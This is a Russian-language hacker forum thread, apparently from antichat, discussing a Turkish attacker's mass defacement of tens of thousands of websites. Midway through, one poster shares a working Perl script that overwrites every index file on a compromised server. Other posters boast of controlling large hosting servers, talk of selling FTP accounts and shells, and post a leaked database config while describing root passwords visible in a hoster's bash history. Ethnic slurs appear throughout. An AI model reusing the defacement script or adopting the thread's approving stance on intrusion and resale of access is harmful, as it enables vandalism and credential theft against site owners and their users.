На прошлой неделе специалисты по вопросам компьютерной безопасности зафиксировали крупнейший в истории интернета взлом веб-сайтов. За считанные часы, хакеру Iskorpitx удалось проникнуть на 21 549 веб-сайтов, а впоследствии злоумышленник "улучшил" свой рекорд еще на 17 тысяч ресурсов.

Хакер Iskorpitx - достаточно хорошо известная личность в кругах киберпреступников. На счету злоумышленника, особо даже не пытающегося скрывать следы своей деятельности, сотни атак на крупные онлайновые ресурсы, в том числе сайты правительственных организаций

Айовы, Джорджии и Теннеси. В марте нынешнего года взломал сайт министерства внутренних дел Бурятии, оставив на нем надпись "HACKED BY iSKORPiTX (TURKISH HACKER)".

На этот раз киберпреступнику удалось оставить сообщения на почти 40 тысячах онлайновых ресурсов. В тексте послания значилось следующее: "HACKED BY Iskorpitx (TURKISH HACKER) FUCKED ARMANIAN-FUCKED FRANCE-FUCKED GREECE-FUCKED PKK TERROR iscorpitx, marque du monde, presente ses salutations a tout le monde".
Кроме того, сообщение сопровождалось турецким флагом.
HiTech.Expert

Я видел несколько этих дефейсов =) Кто-то (не помню кто) мне в аську сЦылы кидал на эти сайты...

Взломал хостинг суперский. Написал скрипт, задефейсил сайты. Красава турецкая. Воще турки лохи!

Воще турки лохи!

100 % меня когда то турок на аську кинул, теперь я их ненавижу :(

Не всё равно жесть 17 тысяч дефейсов даже за сутки этож ****ец просто =)

Уже давно вышла эта новость )
что сказать уже дефейсы со стороны турецких хакеров сталди спортом и политической целью - как всегда обосрать армян.
З.Ы: А у моего знакомого аську - наш же украл, и что наших тоже считать лохами?

а чё так трудно дефейснуть за сутки 17 тысяч сайтов?

есть рут значит пишем bash скрипт который автоматически заменит все файлы index.html иди php на своё нутро Ё

17 тысяч это не круто вот подомной 139 тысяч правда рут надо расшифровать

та... не удевил =))

зачем было дефейсить? 21000 сайтов! да продать фтп акки - огого сколько бабла! А покупателей МОРЕ..... ведет себя как киддис.... тупой какой то... или это типа самореклама?

турки вооще банальные им лиж бы известность нет бы контроль на всем пространством
и баксов куча

Да я же говорю что это лишь себя попиарить.
А так побольше бы настоящих турецких хак команд,таких как SiS например.

Ну пару хостингов он наверно порутал...
Но,повел себя как тупой кидис.
К слову:
#!/usr/bin/perl

exit print "Usage: $0 [deface file] [deface mask]\n" if ($ARGV[0] eq '--help');

$template=$ARGV[0] || 'deface.txt';
$ext=$ARGV[1] || 'index.html';
$backup=1;
$debug=1;
print "Searching documents... Please, wait some minutes\n" if $debug;
system("find / -name \"$ext\" > /tmp/defaces 2>/dev/null");
open(TXT,$template) || die "Cannot find deface text!\n";
@deface=<TXT>;
close(TXT);
open(MASS,"/tmp/defaces") || die "Sorry, no htmls docs found!\n";
while(<MASS>) {
chomp;
if ($backup) {
my $bname="$_".".old";
system("cp \"$_\" \"$bname\"");
}
open(DEFACED,">$_");
print DEFACED @deface;
close(DEFACED);
print "$_ defaced!\n" if $debug;
}
close(MASS);
unlink("/tmp/defaces");
print "All defaces done!\n";

Вот один дефейс _http://forum.pravda.org.ua/ Hacked by BeLa

И вот _http://www.dmp.com.ua/forum/index.php? падлы турецкие!

За считанные часы, хакеру Iskorpitx удалось проникнуть на 21 549 веб-сайтов, а впоследствии злоумышленник "улучшил" свой рекорд еще на 17 тысяч ресурсов.Было бы круто, если кто-нить из ачатовцев похвастался таким же результатом =)

А вот их статистика http://www.secrethackers.org/

чот я смотрю а сайты, то почти все форумные..........

И почти все на phpBB движке!

Может стоит создать раздел "дефейс-лента" ну типа "Defaced by ****" для antichat.ru

а может вы все пойдете лесом со своими дефейсами, дети?

Да это массовое использование баги. Сплойтом короче.

Да короче этот парниша молодца,так как не каждый может похвастаться таким результатом!

Да короче этот парниша молодца,так как не каждый может похвастаться таким результатом!
Не смеши! Так как он - ведут себя только киддисы!
В этом, как уже говорили, ничего сложного нет. И имея на руках доступ к хостингу, массовый деф - самое тупое что можно придумать.

Да это массовое использование баги. Сплойтом короче.
Дык. Ну ясен перец он не каждый сайт как индивидуум дефейсил - сплойты искал )))) и все за одни сутки ;) Просто потратил время, написал неплохой скрипт для поиска и юзания одной и той же баги на сайтах. За скрипт можно еще респект высказать, а за дефейсы - пиар простой :)

И имея на руках доступ к хостингу, массовый деф - самое тупое что можно придумать.


дык , ему то не админы давали доступ к серверам, ты сначала взломай хост с большим числом ,
кстати могу выложить базу infobox вот когда её сломали , то там мы могли задефейсить за минуты около 17 тысяч , но не сделали этого потому что были другие цели! и мне кажется тут каждый (ну почти ) может таким похвастаться, так что в самом дефейсе нет нечего кульного , а больше тупая реклама , а вот сам факт!!!!

дык , ему то не админы давали доступ к серверам, ты сначала взломай хост с большим числом ,


Молчал бы уже! У меня ща доступ к 2 крупным хостам(мелочь не в счет). Общее кол-во сайтов примерно 125 000

Хостинги оч крупные... об одном из них уже известно мемберам...

это утомительно и никому не нужно....

это утомительно и никому не нужно....
Да ладно, вон какая тема обсуждаемая... Дефы для того и делают, чтобы их заметили =)

Кстати чуваку, как пишут, 45 лет...

Человеку нужен был пиар и он его себе сделал.
Возможно теперь он получит себе денег гораздо больше чем продавая аккаунты, он зарекламировал себя как неплохой хакер и теперь будет сидеть и ждать заказов...

night_wolf
После таких тем с обсуждениям хакера врядли кто захочет нанимаеть его.

лажа, всё это, в место того что бы бобоса срубить чел просто всё загубил. надо всё с умом использовать ;)

Не ну чел ступил так это точно....попиарился, а дальше? А так срубил бабок туеву хучю...

Пиар конечно,но сомнительный. Круче было бы крутой сайт ломануть.

Пиар конечно,но сомнительный. Круче было бы крутой сайт ломануть.
да ландно.... 17к шеллов тоже не Хреново ;)

Кстати... Их можно было быстренько загнать.

Вы все на него, ступил, бабла не срубил, а может у него бабла до***а, а он репутацию зарабатывает или может у них в турции что-то вроде отбора в кулхацкеры, "чем больше взломаешь, тем лучьше".

да ландно.... 17к шеллов тоже не Хреново ;)
17к шеллов на одном=двух серве?)) не шути так))))

Пока есть хостинги, у которых на сайтах присутствуют скулы или инклюды, нашей братве будет чем заняться. По крайней мере энная кучка таких хостёров очень просто находится в гугле.
Меня просто бесит, когда хостёры не прочитав самой ламёрской статьи про безопасность в сети, становяться хостёрами. Особенно когда с правами рута подключаешься к базе. Только с логином "root". И без пароля. Так он и ёб**л наверное парочку хостёров со всеми выходящими.
ИМХО: Он наверное поналупил таких хостёров штук несколько и дефнул их автоматом.
И кстати откуда такие точные цифры.
И вобще, в начале статьи 21 тысяча жертв, а в конце 40. Не стыкуется..

А по идее хакер этот вобще идейный человек. Молодца, в любом случае. Хотя я могу и ошибаться.

Ибо любой хостёр просто обязан указывать у себя на сайте, что-то на тему privacy information. И разумеется соблюдать. Иначе жертвами станем не мы, кто занимается секюрети, а простые юзеры, которые ничем никому не обязаны.

Выцепил на одном из серваков агавы -

<?php
$host = "localhost";
$user = "****_root";
$pass = "root";
$db = "****_db";
$server = mysql_connect($host,$user,$pass);
mysql_select_db($db,$server);
$site_host="****";
?>
в **** одно и тоже )

на серваке хостятся около сотни сайтов... в баш хистори попадаются такие записи -

s
[root pass]
su
[root pass in ***] (типа ошибаются)

на сайте тупой инклуд, не проверяемый вообще ничем...

это я к тому, что даже такой крупный как агава совершенно не следят за сервами, за содержимым и тд... взялся за предоставление хостинга - хотя бы смотри за тем какие дырявые скрипты ставят на них...

2 blackybr/ На агаве хостится больше чем 100 сайтов.
Если там нет пароля, в этом скрипте. - это ничего не значит.
На самом деле пароль есть.